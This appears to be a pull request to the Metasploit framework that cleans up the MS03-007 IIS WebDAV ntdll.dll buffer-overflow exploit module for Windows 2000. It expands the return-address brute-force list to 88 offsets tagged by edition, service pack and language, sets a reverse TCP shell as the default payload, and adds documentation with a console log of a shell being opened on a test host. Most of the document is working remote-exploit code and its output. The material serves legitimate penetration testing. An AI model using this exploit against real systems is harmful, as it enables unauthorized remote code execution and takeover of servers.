### PR TITLE
ms03_007_ntdll_webdav: Cleanup and add additional offsets

### DIFF
--- a/documentation/modules/exploit/windows/iis/ms03_007_ntdll_webdav.md
+++ b/documentation/modules/exploit/windows/iis/ms03_007_ntdll_webdav.md
@@ -1,0 +1,105 @@
+## Vulnerable Application
+
+This exploits a buffer overflow in NTDLL.dll on Windows 2000
+through the SEARCH WebDAV method in IIS. This particular
+module only works against Windows 2000. It should have a
+reasonable chance of success against SP0 to SP3.
+
+This module has been tested successfully on:
+
+* Windows 2000 Professional SP0 (EN)
+* Windows 2000 Professional SP0 (FI)
+* Windows 2000 Professional SP0 (NL)
+* Windows 2000 Professional SP0 (TR)
+* Windows 2000 Professional SP1 (AR)
+* Windows 2000 Professional SP1 (CZ)
+* Windows 2000 Professional SP1 (EN)
+* Windows 2000 Professional SP2 (EN)
+* Windows 2000 Professional SP2 (FR)
+* Windows 2000 Professional SP2 (PT)
+* Windows 2000 Professional SP3 (EN)
+* Windows 2000 Server SP0 (DE)
+* Windows 2000 Server SP0 (EN)
+* Windows 2000 Server SP0 (ES)
+* Windows 2000 Server SP0 (FR)
+* Windows 2000 Server SP0 (HU)
+* Windows 2000 Server SP0 (NL)
+* Windows 2000 Server SP0 (PT)
+* Windows 2000 Server SP0 (TR)
+* Windows 2000 Server SP1 (EN)
+* Windows 2000 Server SP1 (SE)
+* Windows 2000 Server SP2 (EN)
+* Windows 2000 Server SP2 (RU)
+* Windows 2000 Server SP3 (DE)
+* Windows 2000 Server SP3 (IT)
+
+## Verification Steps
+
+1. `use exploit/windows/iis/ms03_007_ntdll_webdav`
+1. `set RHOSTS [IP]`
+1. `set PAYLOAD windows/shell/reverse_tcp`
+1. `set LHOST [IP]`
+1. `run`
+
+## Options
+
+
+## Scenarios
+
+### Windows 2000 Professional SP1 (EN)
+
+
+```
+msf6 > use exploit/windows/iis/ms03_007_ntdll_webdav 
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set rhosts 192.168.200.195
+rhosts => 192.168.200.195
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > check
+[+] 192.168.200.195:80 - The target is vulnerable. We've hit a server error (exception)
+msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Trying return address 0x004e004f (1 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[-] Connection failed (3 of 20)...
+[-] Connection failed (4 of 20)...
+[*] Trying return address 0x00ce004f (2 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[*] Trying return address 0x00ce0041 (3 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[-] Connection failed (3 of 20)...
+[-] Connection failed (4 of 20)...
+[*] Trying return address 0x00430041 (4 / 88)...
+[-] Attempt failed: Connection reset by peer
+[*] Checking if IIS is back up after a failed attempt...
+[-] Connection failed (1 of 20)...
+[-] Connection failed (2 of 20)...
+[*] Trying return address 0x00b40041 (5 / 88)...
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.200.195
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1066) at 2022-07-07 06:13:21 -0400
+
+
+Shell Banner:
+Microsoft Windows 2000 [Version 5.00.2195]
+-----
+
+
+C:\WINNT\system32>ver
+ver
+
+Microsoft Windows 2000 [Version 5.00.2195]
+
+C:\WINNT\system32>
+```

--- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
+++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
@@ -9,37 +9,48 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
-      'Description'    => %q{
-        This exploits a buffer overflow in NTDLL.dll on Windows 2000
-        through the SEARCH WebDAV method in IIS. This particular
-        module only works against Windows 2000. It should have a
-        reasonable chance of success against any service pack.
-      },
-      'Author'         => [ 'hdm' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2003-0109'],
-          [ 'OSVDB', '4467'],
-          [ 'BID', '7116'],
-          [ 'MSB', 'MS03-007']
-        ],
-      'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Space'    => 512,
-          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-          'StackAdjustment' => -3500,
+    super(
+      update_info(
+        info,
+        'Name' => 'MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
+        'Description' => %q{
+          This exploits a buffer overflow in NTDLL.dll on Windows 2000
+          through the SEARCH WebDAV method in IIS. This particular
+          module only works against Windows 2000. It should have a
+          reasonable chance of success against SP0 to SP3.
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'Automatic Brute Force', { } ],
+        'Author' => [ 'hdm' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2003-0109'],
+          ['OSVDB', '4467'],
+          ['BID', '7116'],
+          ['PACKETSTORM', '30939'],
+          ['MSB', 'MS03-007']
         ],
-      'DisclosureDate' => '2003-05-30',
-      'DefaultTarget' => 0))
+        'Privileged' => false,
+        'Payload' => {
+          'Space' => 512,
+          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+          'StackAdjustment' => -3500
+        },
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86],
+        'Targets' => [
+          [ 'Automatic Brute Force', {} ],
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DisclosureDate' => '2003-05-30',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_evasion_options(
       [
@@ -48,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
         # XXX - ugh, there has to be a better way to remove entries from an
         # enum that overwriting the evalable enum option
-        OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none'])
+        OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none', 'hex-normal'], 'none'])
       ], self.class
     )
 
@@ -61,125 +72,222 @@ class MetasploitModule < Msf::Exploit::Remote
     # back to 80 for automated exploitation
 
     rport = datastore['RPORT'].to_i
-    if ( rport == 139 or rport == 445 )
-      rport = 80
+    if (rport == 139 || rport == 445)
+      datastore['RPORT'] = 80
     end
 
     true
   end
 
   def check
-    url = 'x' * 65535
-    xml =
-      "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
-      "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
+    # Verify the service is running first
+    res = send_request_raw({ 'uri' => '/' }, 5)
+    return CheckCode::Safe('Connection failed') unless res
+
+    xml = "<?xml version=\"1.0\"?>\r\n"
+    xml << "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
+    xml << "<g:sql>\r\n"
+    xml << "Select \"DAV:displayname\" from scope()\r\n"
+    xml << "</g:sql>\r\n"
+    xml << "</g:searchrequest>\r\n"
 
     response = send_request_cgi({
-      'uri'     => '/' + url,
-      'ctype'   => 'text/xml',
-      'method'  => 'SEARCH',
-      'data'    => xml
+      'uri' => "/#{'x' * 65535}",
+      'ctype' => 'text/xml',
+      'method' => 'SEARCH',
+      'data' => xml
     }, 5)
 
-
-    if (response and response.body =~ /Server Error\(exception/)
-      vprint_status("We've hit a server error (exception)")
-      return Exploit::CheckCode::Vulnerable
+    if response && response.body.to_s.include?('Server Error(exception')
+      return CheckCode::Vulnerable("We've hit a server error (exception)")
     end
 
-    # Did the server stop acceping requests?
+    # Request-URI Too Long
+    if response && response.code == 414
+      return CheckCode::Safe("The server returned #{response.code} (#{response.message})")
+    end
+
+    # Did the server stop accepting requests?
     begin
-      send_request_raw({'uri' => '/'}, 5)
-    rescue
-      vprint_status("The server stopped accepting requests")
-      return Exploit::CheckCode::Vulnerable
+      send_request_raw({ 'uri' => '/' }, 5)
+    rescue StandardError
+      return CheckCode::Appears('The server stopped accepting requests') unless res
     end
 
-    return Exploit::CheckCode::Safe
+    CheckCode::Safe
   end
 
   def exploit
-    # verify the service is running up front
-    send_request_raw({'uri' => '/'}, 5)
+    # Verify the service is running first
+    res = send_request_raw({ 'uri' => '/' }, 5)
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
 
-    # The targets in the most likely order they will work
-    targets =
-    [
-      # Almost Targetted :)
-      "\x4f\x4e", # =SP3
-      "\x41\x42", # ~SP0  ~SP2
-      "\x41\x43", # ~SP1, ~SP2
-
-      # Generic Bruteforce
-      "\x41\xc1",
-      "\x41\xc3",
-      "\x41\xc9",
-      "\x41\xca",
-      "\x41\xcb",
-      "\x41\xcc",
-      "\x41\xcd",
-      "\x41\xce",
-      "\x41\xcf",
-      "\x41\xd0",
+    # Common offsets
+    common_offsets = [
+      "\x4f\x4e", # Windows 2000 Server / Professional (SP3 Universal(?) + some Server SP0/SP1/SP2)
+      "\x4f\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)
+      "\x41\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)
+      "\x41\xb4", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
+      "\x41\xb8", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 FR / SP2 PT)
     ]
 
-    xml =
-      "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
-      "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
+    # Generic Bruteforce - Windows 2000 Professional
+    pro_offsets = [
+      "\x41\xa8", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
+      "\x41\xa9", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
+      "\x41\xaa", # Windows 2000 Professional (SP1 EN / SP2 FR / SP2 PT)
+      "\x41\xab", # Windows 2000 Professional (SP1 AR)
+      "\x41\xac", # Windows 2000 Professional (SP0 FI)
+      "\x41\xad", # Windows 2000 Professional (SP0 FI / SP0 TR / SP1 CZ)
+      "\x41\xae", # Windows 2000 Professional (SP0 FI / SP0 TR / SP1 CZ)
+      "\x41\xaf",
+
+      "\x41\xb0",
+      "\x41\xb1", # Windows 2000 Professional (SP0 EN)
+      "\x41\xb2", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 EN / SP2 EN / SP2 PT)
+      "\x41\xb3", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 FR / SP2 PT)
+      "\x41\xb4", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP1 EN / SP2 EN / SP2 FR / SP2 PT)
+      "\x41\xb5", # Windows 2000 Professional (SP0 EN / SP0 NL / SP1 AR / SP2 EN / SP2 FR / SP2 PT)
+      "\x41\xb6", # Windows 2000 Professional (SP0 NL / SP1 AR / SP2 FR / SP2 PT)
+      "\x41\xb7", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 TR / SP1 AR / SP1 CZ / SP2 FR)
+      "\x41\xb8", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 FR / SP2 PT)
+      "\x41\xb9", # Windows 2000 Professional (SP0 FI / SP0 NL / SP0 TR / SP1 AR / SP2 FR / SP2 PT)
+      "\x41\xba", # Windows 2000 Professional (SP0 EN / SP0 FI / SP0 TR / SP2 FR)
+      "\x41\xbb", # Windows 2000 Professional (SP0 FI / SP0 NL / SP0 TR / SP1 CZ / SP2 PT)
+      "\x41\xbc", # Windows 2000 Professional (SP0 FI / SP1 AR / SP2 FR)
+      "\x41\xbd", # Windows 2000 Professional (SP0 FI / SP0 TR)
+      "\x41\xbe", # Windows 2000 Professional (SP0 TR)
+      "\x41\xbf", # Windows 2000 Professional (SP0 FI)
+    ]
+
+    # Generic Bruteforce - Windows 2000 Server
+    server_offsets = [
+      "\x4f\xc0", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
+      "\x4f\xc1", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x4f\xc2", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x4f\xc3", # Windows 2000 Server (SP1 EN / SP2 EN)
+      "\x4f\xc4", # Windows 2000 Server (SP2 EN)
+      "\x4f\xc5", # Windows 2000 Server (SP0 ES / SP0 TR)
+      "\x4f\xc6", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 SE)
+      "\x4f\xc7", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR / SP1 SE)
+      "\x4f\xc8", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 SE)
+      "\x4f\xc9", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x4f\xca", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x4f\xcb", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP0 TR / SP1 EN / SP2 EN)
+      "\x4f\xcc", # Windows 2000 Server (SP0 DE / SP1 EN / SP2 EN)
+      "\x4f\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP0 TR)
+      "\x4f\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x4f\xcf", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 EN / SP2 EN)
+
+      "\x4f\x40",
+      "\x4f\x41",
+      "\x4f\x42", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
+      "\x4f\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)
+      "\x4f\x44",
+      "\x4f\x45",
+      "\x4f\x46",
+      "\x4f\x47", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR)
+      "\x4f\x48",
+      "\x4f\x49",
+      "\x4f\x4a",
+      "\x4f\x4b",
+      "\x4f\x4c",
+      "\x4f\x4d",
+      "\x4f\x4e", # Windows 2000 Server / Professional (SP3 Universal(?) + some Server SP0/SP1/SP2)
+      "\x4f\x4f",
+
+      "\x41\x40",
+      "\x41\x41",
+      "\x41\x42", # Windows 2000 Server (SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
+      "\x41\x43", # Windows 2000 Server (SP1 EN / SP2 EN / SP2 RU)
+      "\x41\x44",
+      "\x41\x45",
+      "\x41\x46",
+      "\x41\x47", # Windows 2000 Server (SP0 ES / SP0 HU)
+      "\x41\x48", # Windows 2000 Server (SP1 SE)
+      "\x41\x49",
+      "\x41\x4a",
+      "\x41\x4b",
+      "\x41\x4c",
+      "\x41\x4d",
+      "\x41\x4e",
+      "\x41\x4f",
+
+      "\x41\xc0", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
+      "\x41\xc1", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x41\xc2", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x41\xc3", # Windows 2000 Server (SP1 EN / SP2 EN)
+      "\x41\xc4", # Windows 2000 Server (SP2 EN)
+      "\x41\xc5", # Windows 2000 Server (SP0 ES / SP0 TR)
+      "\x41\xc6", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 SE)
+      "\x41\xc7", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR / SP1 SE)
+      "\x41\xc8", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 SE)
+      "\x41\xc9", # Windows 2000 Server (SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x41\xca", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x41\xcb", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
+      "\x41\xcc", # Windows 2000 Server (SP0 DE / SP1 EN / SP2 EN)
+      "\x41\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 IT / SP0 HU / SP0 NL / SP0 PT / SP0 TR)
+      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)
+      "\x41\xcf", # Windows 2000 Server (SP0 DE / SP0 ES / SP0 NL / SP0 TR / SP1 EN / SP1 SE / SP2 EN)
+    ]
 
     if datastore['InvalidSearchRequest']
-      xml = rand_text(rand(1024) + 32)
+      xml = rand_text(32..1056)
+    else
+      xml = "<?xml version=\"1.0\"?>\r\n"
+      xml << "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
+      xml << "<g:sql>\r\n"
+      xml << "Select \"DAV:displayname\" from scope()\r\n"
+      xml << "</g:sql>\r\n"
+      xml << "</g:searchrequest>\r\n"
     end
 
     # The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
     # This decodes to "inc ecx"
+    url = 'A' * (65_516 - payload.encoded.length)
+    url << payload.encoded
 
-    url = 'A' * 65516
-    url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
+    offsets = common_offsets.concat(server_offsets).concat(pro_offsets).uniq
 
-    targets.each { |ret|
-
-      print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
-      url[ 283, 2 ] = ret
+    offsets.each_with_index do |ret, index|
+      print_status("Trying return address #{format('0x%.8x', Rex::Text.to_unicode(ret).unpack('V*').first)} (#{index + 1} / #{offsets.length})...")
+      url[283, 2] = ret
 
       begin
         send_request_cgi({
-          'uri'     => '/' + url,
-          'ctype'   => 'text/xml',
-          'method'  => 'SEARCH',
-          'data'    => xml
+          'uri' => "/#{url}",
+          'ctype' => 'text/xml',
+          'method' => 'SEARCH',
+          'data' => xml
         }, 5)
-        handler
-      rescue => e
+      rescue StandardError => e
         print_error("Attempt failed: #{e}")
       end
 
-      1.upto(8) { |i|
-        select(nil,nil,nil,0.25)
-        return if self.session_created?
-      }
-
-      if !service_running?
-        print_error('Giving up, IIS must have completely crashed')
-        return
+      1.upto(8) do |_i|
+        select(nil, nil, nil, 0.25)
+        break if session_created?
       end
-    }
+
+      break if session_created?
+
+      fail_with(Failure::Unreachable, 'Giving up, IIS must have completely crashed') unless service_running?
+    end
   end
 
   # Try connecting to the server up to 20 times, with a two second gap
   # This gives the server time to recover after a failed exploit attempt
   def service_running?
     print_status('Checking if IIS is back up after a failed attempt...')
-    1.upto(20) {|i|
-      begin
-        send_request_raw({'uri' => '/'}, 5)
-      rescue
-        print_error("Connection failed (#{i} of 20)...")
-        select(nil,nil,nil,2)
-        next
-      end
-      return true
-    }
-    return false
+    1.upto(20) do |i|
+      break if session_created?
+
+      return true if send_request_raw({ 'uri' => '/' }, 5)
+
+      print_error("Connection failed (#{i} of 20)...")
+      select(nil, nil, nil, 2)
+    end
+    false
   end
 end


### PR DESCRIPTION
Resolves Rubocop violations.

Adds documentation.

Adds `Notes` module meta information.

Sets default payload to `windows/shell/reverse_tcp`. Meterpreter no longer supports platforms before Windows XP SP3.

Updates the module description. The description stated "It should have a reasonable chance of success against any service pack." - however, the module was released before SP4 which patches MS03-007.

Fixed a bug in `service_running?` which was supposed to retry connecting 20 times to verify that the service was still running, but instead it checked only once then carried on anyway.

Fixed a bug where the module didn't first check that the service was live before attempting exploitation, and instead sprayed exploit attempts at the specified `rhost:rport` combination until completion.

Prints progress `(<num> / <total offsets>)` during address brute-force.


# Offsets

The original module defines several likely target offsets before other targets:

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb#L108-L111

The existing SP3 target appears to be universal for Professional/Server and languages, based on limited testing of SP3 systems. This was the only offset identified which worked on both Professional and Server.

In practice, the other two are not likely. Given that the module was developed in 2003 when OS virtualisation was in its infancy, I presume there was limited access to test systems and these were presumed likely based on a small sample.

The module also listed a limited range of offsets for brute-force:

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb#L113-L123

In testing, I found that `"\x41\xc_"` offsets (`0x00c_0041`) only work on Windows 2000 Server (not Professional) and failed on Windows 2000 SP2 (RU).

```
      "\x41\xc0", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT)
      "\x41\xc1", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
      "\x41\xc2", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
      "\x41\xc3", # Windows 2000 Server (SP1 EN / SP2 EN)
      "\x41\xc4", # Windows 2000 Server (SP2 EN)
      "\x41\xc5", # Windows 2000 Server (SP0 ES / SP0 TR)
      "\x41\xc6", # Windows 2000 Server (SP0 ES / SP0 TR / SP1 SE)
      "\x41\xc7", # Windows 2000 Server (SP0 ES / SP0 HU / SP0 TR / SP1 SE)
      "\x41\xc8", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 SE)
      "\x41\xc9", # Windows 2000 Server (SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
      "\x41\xca", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
      "\x41\xcb", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 FR / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP2 EN)
      "\x41\xcc", # Windows 2000 Server (SP0 DE / SP1 EN / SP2 EN)
      "\x41\xcd", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 IT / SP0 HU / SP0 NL / SP0 PT / SP0 TR)
      "\x41\xce", # Windows 2000 Server (SP0 DE / SP0 EN / SP0 ES / SP0 FR / SP0 HU / SP0 IT / SP0 NL / SP0 PT / SP1 EN / SP1 SE / SP2 EN)
      "\x41\xcf", # Windows 2000 Server (SP0 DE / SP0 ES / SP0 NL / SP0 TR / SP1 EN / SP1 SE / SP2 EN)
```

The number of offsets has been expanded significantly (previously 13 - now 88) to allow successful exploitation on non-English language systems and Windows 2000 Professional. The module still has a list of likely offsets which are tried first. This list has been expanded.

Note that while success for `"\x41\xc_"` and `"\x4f\xc_"` were almost identical in terms of affected targets, both ranges are included, as exploitation can still fail sometimes for known-good offsets.

This module has been tested successfully on:

* Windows 2000 Professional SP0 (EN)
* Windows 2000 Professional SP0 (FI)
* Windows 2000 Professional SP0 (NL)
* Windows 2000 Professional SP0 (TR)
* Windows 2000 Professional SP1 (AR)
* Windows 2000 Professional SP1 (CZ)
* Windows 2000 Professional SP1 (EN)
* Windows 2000 Professional SP2 (EN)
* Windows 2000 Professional SP2 (FR)
* Windows 2000 Professional SP2 (PT)
* Windows 2000 Professional SP3 (EN)
* Windows 2000 Server SP0 (DE)
* Windows 2000 Server SP0 (EN)
* Windows 2000 Server SP0 (ES)
* Windows 2000 Server SP0 (FR)
* Windows 2000 Server SP0 (HU)
* Windows 2000 Server SP0 (NL)
* Windows 2000 Server SP0 (PT)
* Windows 2000 Server SP0 (TR)
* Windows 2000 Server SP1 (EN)
* Windows 2000 Server SP1 (SE)
* Windows 2000 Server SP2 (EN)
* Windows 2000 Server SP2 (RU)
* Windows 2000 Server SP3 (DE)
* Windows 2000 Server SP3 (IT)

This module is still unlikely to work on Korean, Chinese or Greek language systems for reasons I didn't bother to investigate. Tested unsuccessfully:

* Windows 2000 Server SP0 (CN)
* Windows 2000 Professional SP0 (KO)
* Windows 2000 Professional SP1 (GR)
